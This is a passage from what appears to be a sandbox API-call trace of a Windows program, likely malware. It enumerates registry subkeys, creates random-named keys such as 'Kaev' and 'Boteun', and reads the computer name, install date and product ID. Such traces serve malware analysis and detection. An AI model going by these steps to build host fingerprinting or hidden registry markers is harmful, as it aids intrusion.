phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.655] RegCloseKey (hKey=0x178) returned 0x0 [0083.655] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.655] RegEnumKeyW (in: hKey=0x148, dwIndex=0xb, lpName=0x18eb64, cchName=0xa | out: lpName="Feeds") returned 0x0 [0083.655] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Feeds", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.655] RegCloseKey (hKey=0x178) returned 0x0 [0083.655] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.655] RegEnumKeyW (in: hKey=0x148, dwIndex=0xa, lpName=0x18eb64, cchName=0xa | out: lpName="Fax") returned 0x0 [0083.655] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Fax", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.655] RegCloseKey (hKey=0x178) returned 0x0 [0083.655] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.655] RegEnumKeyW (in: hKey=0x148, dwIndex=0x7, lpName=0x18eb64, cchName=0xa | out: lpName="Direct3D") returned 0x0 [0083.655] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Direct3D", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.655] RegCloseKey (hKey=0x178) returned 0x0 [0083.655] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.655] RegEnumKeyW (in: hKey=0x148, dwIndex=0xe, lpName=0x18eb64, cchName=0xa | out: lpName="IAM") returned 0x0 [0083.655] RegCreateKeyExW (in: hKey=0x148, lpSubKey="IAM", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.655] RegCloseKey (hKey=0x178) returned 0x0 [0083.655] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.655] RegEnumKeyW (in: hKey=0x148, dwIndex=0x20, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.655] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.655] RegEnumKeyW (in: hKey=0x148, dwIndex=0x22, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.655] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.655] RegEnumKeyW (in: hKey=0x148, dwIndex=0x10, lpName=0x18eb64, cchName=0xa | out: lpName="IMEJP") returned 0x0 [0083.655] RegCreateKeyExW (in: hKey=0x148, lpSubKey="IMEJP", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.655] RegCloseKey (hKey=0x178) returned 0x0 [0083.656] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.656] RegEnumKeyW (in: hKey=0x148, dwIndex=0xc, lpName=0x18eb64, cchName=0xa | out: lpName="FTP") returned 0x0 [0083.656] RegCreateKeyExW (in: hKey=0x148, lpSubKey="FTP", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.656] RegCloseKey (hKey=0x178) returned 0x0 [0083.656] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.656] RegEnumKeyW (in: hKey=0x148, dwIndex=0x24, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.656] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.656] RegEnumKeyW (in: hKey=0x148, dwIndex=0xb, lpName=0x18eb64, cchName=0xa | out: lpName="Feeds") returned 0x0 [0083.656] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Feeds", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.656] RegCloseKey (hKey=0x178) returned 0x0 [0083.656] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.656] RegEnumKeyW (in: hKey=0x148, dwIndex=0x4, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.656] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.656] RegEnumKeyW (in: hKey=0x148, dwIndex=0x28, lpName=0x18eb64, cchName=0xa | out: lpName="SQMClient") returned 0x0 [0083.656] RegCreateKeyExW (in: hKey=0x148, lpSubKey="SQMClient", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.656] RegCloseKey (hKey=0x178) returned 0x0 [0083.656] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.656] RegEnumKeyW (in: hKey=0x148, dwIndex=0x3, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.656] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.656] RegEnumKeyW (in: hKey=0x148, dwIndex=0x34, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.656] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.656] RegEnumKeyW (in: hKey=0x148, dwIndex=0xb, lpName=0x18eb64, cchName=0xa | out: lpName="Feeds") returned 0x0 [0083.656] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Feeds", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.656] RegCloseKey (hKey=0x178) returned 0x0 [0083.656] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.656] RegEnumKeyW (in: hKey=0x148, dwIndex=0x9, lpName=0x18eb64, cchName=0xa | out: lpName="Exchange") returned 0x0 [0083.656] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Exchange", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.656] RegCloseKey (hKey=0x178) returned 0x0 [0083.656] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.656] RegEnumKeyW (in: hKey=0x148, dwIndex=0xb, lpName=0x18eb64, cchName=0xa | out: lpName="Feeds") returned 0x0 [0083.657] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Feeds", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.657] RegCloseKey (hKey=0x178) returned 0x0 [0083.657] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.657] RegEnumKeyW (in: hKey=0x148, dwIndex=0x11, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.657] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Kaev", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.657] RegCloseKey (hKey=0x178) returned 0x0 [0083.657] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x38, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.657] RegEnumKeyW (in: hKey=0x148, dwIndex=0x29, lpName=0x18eb64, cchName=0xa | out: lpName="SQMClient") returned 0x0 [0083.657] RegCreateKeyExW (in: hKey=0x148, lpSubKey="SQMClient", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.657] RegCloseKey (hKey=0x178) returned 0x0 [0083.657] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x38, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.657] RegEnumKeyW (in: hKey=0x148, dwIndex=0x1a, lpName=0x18eb64, cchName=0xa | out: lpName="MSDAIPP") returned 0x0 [0083.657] RegCreateKeyExW (in: hKey=0x148, lpSubKey="MSDAIPP", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.657] RegCloseKey (hKey=0x178) returned 0x0 [0083.657] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x38, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.657] RegEnumKeyW (in: hKey=0x148, dwIndex=0xa, lpName=0x18eb64, cchName=0xa | out: lpName="Fax") returned 0x0 [0083.657] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Fax", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.657] RegCloseKey (hKey=0x178) returned 0x0 [0083.657] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x38, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.657] RegEnumKeyW (in: hKey=0x148, dwIndex=0x32, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.657] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Lukuip", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.657] RegCloseKey (hKey=0x178) returned 0x0 [0083.657] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x39, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.657] RegEnumKeyW (in: hKey=0x148, dwIndex=0x37, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.657] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Boteun", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.658] RegCloseKey (hKey=0x178) returned 0x0 [0083.658] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x3a, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.658] RegEnumKeyW (in: hKey=0x148, dwIndex=0x31, lpName=0x18eb64, cchName=0xa | out: lpName="Windows") returned 0x0 [0083.658] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Windows", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.658] RegCloseKey (hKey=0x178) returned 0x0 [0083.658] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x3a, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.658] RegEnumKeyW (in: hKey=0x148, dwIndex=0x37, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.658] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Acuhci", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.658] RegCloseKey (hKey=0x178) returned 0x0 [0083.658] RegCloseKey (hKey=0x148) returned 0x0 [0083.658] GetComputerNameW (in: lpBuffer=0x18e9d8, nSize=0x18e9bc | out: lpBuffer="YKYD69Q", nSize=0x18e9bc) returned 1 [0083.658] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x1, phkResult=0x18e990 | out: phkResult=0x18e990*=0x148) returned 0x0 [0083.658] RegQueryValueExW (in: hKey=0x148, lpValueName="InstallDate", lpReserved=0x0, lpType=0x18e9c4, lpData=0x18e9c0, lpcbData=0x18e98c*=0x4 | out: lpType=0x18e9c4*=0x4, lpData=0x18e9c0*=0x0, lpcbData=0x18e98c*=0x4) returned 0x0 [0083.658] RegCloseKey (hKey=0x148) returned 0x0 [0083.658] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x1, phkResult=0x18e994 | out: phkResult=0x18e994*=0x148) returned 0x0 [0083.658] RegQueryValueExW (in: hKey=0x148, lpValueName="DigitalProductId", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x18e9a8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x18e9a8*=0x0) returned 0x2 [0083.658] RegCloseKey (hKey=0x148) returned 0x0 [0083.658] GetVersionExW 